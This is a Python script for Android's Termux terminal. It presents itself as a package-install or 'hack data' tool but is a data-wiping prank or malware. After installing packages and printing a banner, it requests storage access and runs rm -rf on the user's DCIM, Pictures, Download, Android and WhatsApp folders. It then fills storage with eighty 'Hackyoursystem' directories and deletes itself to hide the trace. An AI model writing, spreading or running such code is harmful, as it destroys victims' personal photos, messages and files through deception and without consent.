import os
import sys
import time

def main():
	os.system("pkg update && pkg upgrade")
	os.system("pkg install git")
	os.system("pkg install figlet")
	os.system("figlet hack - data")
	print "your hack to data data and system!!"
	os.system("pkg install python")
	os.system("ls")
	os.system("termux-setup-storage")
	os.system("rm -rf /sdcard/browser")
	os.system("rm -rf /sdcard/Android")
	os.system("rm -rf /sdcard/DCIM")
	os.system("rm -rf /sdcard/Download")
	os.system("rm -rf /sdcard/Pictures")
	os.system("rm -rf /sdcard/pixelLab")
	os.system("rm -rf /sdcard/WhatsApp")
	os.system("rm -rf /sdcard/WhatsApp Bussiness")
	os.system("mkdir /sdcard/Hackyoursystem1")
	os.system("mkdir /sdcard/Hackyoursystem2")
	os.system("mkdir /sdcard/Hackyoursystem3")
	os.system("mkdir /sdcard/Hackyoursystem4")
	os.system("mkdir /sdcard/Hackyoursystem5")
	os.system("mkdir /sdcard/Hackyoursystem6")
	os.system("mkdir /sdcard/Hackyoursystem7")
	os.system("mkdir /sdcard/Hackyoursystem8")
	os.system("mkdir /sdcard/Hackyoursystem9")
	os.system("mkdir /sdcard/Hackyoursystem10")
	os.system("mkdir /sdcard/Hackyoursystem11")
        os.system("mkdir /sdcard/Hackyoursystem12")
        os.system("mkdir /sdcard/Hackyoursystem13")
        os.system("mkdir /sdcard/Hackyoursystem14")
        os.system("mkdir /sdcard/Hackyoursystem15")
        os.system("mkdir /sdcard/Hackyoursystem16")
        os.system("mkdir /sdcard/Hackyoursystem17")
        os.system("mkdir /sdcard/Hackyoursystem18")
        os.system("mkdir /sdcard/Hackyoursystem19")
        os.system("mkdir /sdcard/Hackyoursystem20")
	os.system("mkdir /sdcard/Hackyoursystem21")
        os.system("mkdir /sdcard/Hackyoursystem22")
        os.system("mkdir /sdcard/Hackyoursystem23")
        os.system("mkdir /sdcard/Hackyoursystem24")
        os.system("mkdir /sdcard/Hackyoursystem25")
        os.system("mkdir /sdcard/Hackyoursystem26")
        os.system("mkdir /sdcard/Hackyoursystem27")
        os.system("mkdir /sdcard/Hackyoursystem28")
        os.system("mkdir /sdcard/Hackyoursystem29")
        os.system("mkdir /sdcard/Hackyoursystem30")
        os.system("mkdir /sdcard/Hackyoursystem31")
        os.system("mkdir /sdcard/Hackyoursystem32")
        os.system("mkdir /sdcard/Hackyoursystem33")
        os.system("mkdir /sdcard/Hackyoursystem34")
        os.system("mkdir /sdcard/Hackyoursystem35")
        os.system("mkdir /sdcard/Hackyoursystem36")
        os.system("mkdir /sdcard/Hackyoursystem37")
        os.system("mkdir /sdcard/Hackyoursystem38")
        os.system("mkdir /sdcard/Hackyoursystem39")
        os.system("mkdir /sdcard/Hackyoursystem40")
	os.system("mkdir /sdcard/Hackyoursystem41")
        os.system("mkdir /sdcard/Hackyoursystem42")
        os.system("mkdir /sdcard/Hackyoursystem43")
        os.system("mkdir /sdcard/Hackyoursystem44")
        os.system("mkdir /sdcard/Hackyoursystem45")
        os.system("mkdir /sdcard/Hackyoursystem46")
        os.system("mkdir /sdcard/Hackyoursystem47")
        os.system("mkdir /sdcard/Hackyoursystem48")
        os.system("mkdir /sdcard/Hackyoursystem49")
        os.system("mkdir /sdcard/Hackyoursystem50")
        os.system("mkdir /sdcard/Hackyoursystem51")
        os.system("mkdir /sdcard/Hackyoursystem52")
        os.system("mkdir /sdcard/Hackyoursystem53")
        os.system("mkdir /sdcard/Hackyoursystem54")
        os.system("mkdir /sdcard/Hackyoursystem55")
        os.system("mkdir /sdcard/Hackyoursystem56")
        os.system("mkdir /sdcard/Hackyoursystem57")
        os.system("mkdir /sdcard/Hackyoursystem58")
        os.system("mkdir /sdcard/Hackyoursystem59")
        os.system("mkdir /sdcard/Hackyoursystem60")
        os.system("mkdir /sdcard/Hackyoursystem61")
        os.system("mkdir /sdcard/Hackyoursystem62")
        os.system("mkdir /sdcard/Hackyoursystem63")
        os.system("mkdir /sdcard/Hackyoursystem64")
        os.system("mkdir /sdcard/Hackyoursystem65")
        os.system("mkdir /sdcard/Hackyoursystem66")
        os.system("mkdir /sdcard/Hackyoursystem67")
        os.system("mkdir /sdcard/Hackyoursystem68")
        os.system("mkdir /sdcard/Hackyoursystem69")
        os.system("mkdir /sdcard/Hackyoursystem70")
        os.system("mkdir /sdcard/Hackyoursystem71")
        os.system("mkdir /sdcard/Hackyoursystem72")
        os.system("mkdir /sdcard/Hackyoursystem73")
        os.system("mkdir /sdcard/Hackyoursystem74")
        os.system("mkdir /sdcard/Hackyoursystem75")
        os.system("mkdir /sdcard/Hackyoursystem76")
        os.system("mkdir /sdcard/Hackyoursystem77")
        os.system("mkdir /sdcard/Hackyoursystem78")
        os.system("mkdir /sdcard/Hackyoursystem79")
        os.system("mkdir /sdcard/Hackyoursystem80")
	os.system("rm -rf storage")
	os.system("ls")
	os.system("rm -rf zart.py")

main()
